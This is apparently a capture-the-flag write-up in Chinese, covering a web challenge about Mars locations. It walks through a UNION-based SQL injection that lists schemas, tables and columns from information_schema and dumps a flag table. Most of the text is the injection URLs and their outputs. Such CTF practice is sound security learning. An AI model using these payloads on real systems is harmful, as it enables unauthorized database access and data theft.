长记性了,我先扫一遍看看有没有什么文件备份,泄露之类的。发现没有。
抓个包看看,发现莫名参数,最先想到的就是模板注入吧,然后发现是sql注入
有两个回显,啥也没过滤,就是sql注入那一套,干就行了
/query?search=olympus_mons%20union%20select%202,database()&{}&_=1649851408180
//aliens
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='aliens'
//"amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin"
表名好多啊
一个一个试吧,MD,都没有,靠。
爆其他的数据库
/query?search=olympus_mons%20union%20select%202,group_concat(schema_name)%20from%20information_schema.schemata
//information_schema,alien_code,aliens
爆alien_code的表
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='alien_code'
//code
/query?search=olympus_mons%20union%20select%202,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='code'
//id,code
/query?search=olympus_mons%20union%20select%202,group_concat(id,code)%20from%20alien_code.code
//0flag{.。。。。。。。。。。。。。。。。。。}